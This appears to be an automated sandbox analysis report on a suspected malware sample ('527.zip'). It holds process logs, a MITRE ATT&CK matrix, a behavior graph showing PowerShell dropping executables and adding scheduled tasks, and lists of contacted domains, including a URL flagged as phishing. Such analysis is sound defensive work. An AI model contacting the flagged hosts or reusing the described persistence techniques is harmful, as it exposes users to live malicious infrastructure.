Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		12
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
PowerShell		1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		21
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		12
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Extra Window Memory Injection		1
Rundll32		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials14
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591248 Sample: 527.zip Startdate: 14/01/2025 Architecture: WINDOWS Score: 80 77 youtube-ui.l.google.com 2->77 79 www.youtube.com 2->79 81 33 other IPs or domains 2->81 97 Malicious sample detected (through community Yara rule) 2->97 99 Antivirus detection for URL or domain 2->99 101 Sigma detected: Potentially Suspicious PowerShell Child Processes 2->101 9 powershell.exe 15 2->9         started        12 firefox.exe 1 2->12         started        14 .exe 2->14         started        16 4 other processes 2->16 signatures3 process4 dnsIp5 107 Suspicious powershell command line found 9->107 109 Uses schtasks.exe or at.exe to add and modify task schedules 9->109 111 Found suspicious powershell code related to unpacking or dynamic code loading 9->111 113 Powershell drops PE file 9->113 19 cmd.exe 9->19         started        21 cmd.exe 9->21         started        23 conhost.exe 1 9->23         started        25 firefox.exe 2 215 12->25         started        29 .exe 14->29         started        31 conhost.exe 14->31         started        71 192.168.2.13 unknown unknown 16->71 73 192.168.2.16, 138, 443, 49448 unknown unknown 16->73 75 2 other IPs or domains 16->75 33 chrome.exe 16->33         started        35 conhost.exe 1 16->35         started        signatures6 process7 dnsIp8 37 powershell.exe 19->37         started        41 conhost.exe 19->41         started        43 conhost.exe 21->43         started        45 powershell.exe 21->45         started        83 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49726, 49731, 49738 GOOGLEUS United States 25->83 85 push.services.mozilla.com 34.107.243.93, 443, 49745, 49759 GOOGLEUS United States 25->85 93 9 other IPs or domains 25->93 67 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 25->67 dropped 69 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 25->69 dropped 47 firefox.exe 1 25->47         started        49 firefox.exe 1 25->49         started        51 firefox.exe 1 25->51         started        87 boinc.berkeley.edu 208.68.240.115, 443, 49814, 49817 UCBUS United States 29->87 89 rosettahome.cn 104.238.61.8, 49813, 49816, 49820 ASN-QUADRANET-GLOBALUS United States 29->89 53 .exe 29->53         started        55 conhost.exe 29->55         started        91 www.google.com 216.58.206.36, 443, 49710, 49715 GOOGLEUS United States 33->91 95 3 other IPs or domains 33->95 file9 process10 file11 63 C:\Users\user\AppData\Roaming\...\boinc.exe, PE32+ 37->63 dropped 65 C:\Users\user\AppData\Roaming\...\.exe (copy), PE32+ 37->65 dropped 103 Suspicious powershell command line found 37->103 105 Loading BitLocker PowerShell Module 37->105 57 schtasks.exe 37->57         started        59 powershell.exe 37->59         started        61 conhost.exe 53->61         started        signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)5%ReversingLabs
C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe5%ReversingLabs
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://identity.mozilla.com/apps/oldsync0%Avira URL Cloudsafe
https://identity.mozilla.com/cmd/resource://gre/modules/FileUtils.sys.mjsidentity.fxaccounts.remote.0%Avira URL Cloudsafe
https://identity.mozilla.com/ids/ecosystem_telemetrynot0%Avira URL Cloudsafe
http://rosettahome.top/rosettahome_cgi/cgi100%Avira URL Cloudphishing
http://www.urwpp.de0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
example.org
93.184.215.14
truefalse
    		high
    star-mini.c10r.facebook.com
    		157.240.0.35
    		truefalse
      		high
      prod.classify-client.prod.webservices.mozgcp.net
      		35.190.72.216
      		truefalse
        		high
        twitter.com
        		104.244.42.65
        		truefalse
          		high
          prod.balrog.prod.cloudops.mozgcp.net
          		35.244.181.201
          		truefalse
            		high
            prod.detectportal.prod.cloudops.mozgcp.net
            		34.107.221.82
            		truefalse
              		high
              services.addons.mozilla.org
              		151.101.129.91
              		truefalse
                		high
                plus.l.google.com
                		216.58.206.78
                		truefalse
                  		high
                  rosettahome.top
                  		104.238.61.8
                  		truefalse
                    		unknown
                    dyna.wikimedia.org
                    		185.15.59.224
                    		truefalse
                      		high
                      prod.remote-settings.prod.webservices.mozgcp.net
                      		34.149.100.209
                      		truefalse
                        		high
                        contile.services.mozilla.com
                        		34.117.188.166
                        		truefalse
                          		high
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          		34.160.144.191
                          		truefalse
                            		high
                            dualstack.reddit.map.fastly.net
                            		151.101.1.140
                            		truefalse
                              		high
                              youtube-ui.l.google.com
                              		142.250.186.110
                              		truefalse
                                		high
                                play.google.com
                                		142.250.185.206
                                		truefalse
                                  		high
                                  ipv4only.arpa
                                  		192.0.0.171
                                  		truefalse
                                    		high
                                    prod.ads.prod.webservices.mozgcp.net
                                    		34.117.188.166
                                    		truefalse
                                      		high
                                      push.services.mozilla.com
                                      		34.107.243.93
                                      		truefalse
                                        		high
                                        www.google.com
                                        		216.58.206.36
                                        		truefalse
                                          		high
                                          boinc.berkeley.edu
                                          		208.68.240.115
                                          		truefalse
                                            		high
                                            normandy-cdn.services.mozilla.com
                                            		35.201.103.21
                                            		truefalse
                                              		high
                                              telemetry-incoming.r53-2.services.mozilla.com
                                              		34.120.208.123
                                              		truefalse
                                                		high
                                                rosettahome.cn
                                                		104.238.61.8
                                                		truefalse
                                                  		unknown
                                                  www.reddit.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    spocs.getpocket.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      content-signature-2.cdn.mozilla.net
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        firefox.settings.services.mozilla.com
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          www.youtube.com
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            www.facebook.com
                                                            		unknown
                                                            		unknownfalse
                                                              		high
                                                              detectportal.firefox.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                normandy.cdn.mozilla.net
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  shavar.services.mozilla.com
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    apis.google.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high
                                                                      www.wikipedia.org
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		high

                                                                        Contacted URLs

                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        http://rosettahome.top/rosettahome_cgi/cgifalse
                                                                        • Avira URL Cloud: phishing
                                                                        		unknown
                                                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                          		high

                                                                          URLs from Memory and Binaries

                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/channelfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://identity.mozilla.com/cmd/resource://gre/modules/FileUtils.sys.mjsidentity.fxaccounts.remote.firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://mozilla.org/#/properties/proposedEnrollmentfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://detectportal.firefox.com/firefox.exe, 00000003.00000003.1808462601.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://mozilla.org/#/properties/schemaVersionfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/valuefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.mozilla.com0firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drfalse
                                                                                          		high
                                                                                          https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 00000006.00000002.2640388239.000002A67A072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.0000027125881000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://json-schema.org/draft/2019-09/schema.firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://mozilla.org/#/properties/disableGreaseOnFallbackfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://mozilla.org/#/properties/originsDaysCutOfffirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataTypefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://spocs.getpocket.com/spocsfirefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1632639718.000001CA195E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://screenshots.firefox.comfirefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://identity.mozilla.com/ids/ecosystem_telemetryUfirefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&firefox.exe, 00000003.00000003.1504434772.000001CA0C2CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://mozilla.org/#/properties/richSuggestionsFeatureGatefirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 00000003.00000003.1628297834.000001CA1B42C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1657219167.000001CA1B42C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://mozilla.org/#/properties/branchesfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825167878.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1509442711.000001CA196E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1746053955.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671828475.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://mozilla.org/#/properties/userFacingNamefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://profiler.firefox.com/firefox.exe, 00000003.00000003.1634817342.000001CA7F2F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://mozilla.org/)firefox.exe, 00000003.00000003.1997307852.00002484CB303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2000847293.000035CDA6803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://mozilla.org/#/properties/quickSuggestSponsoredEnabledfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://mozilla.org/0firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/mozilla-services/screenshotsfirefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-deffirefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://tracking-protection-issues.herokuapp.com/newfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://mozilla.org/#/properties/referenceBranchfirefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://mozilla.org/#/properties/quickSuggestSponsoredIndexfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=htfirefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                		high
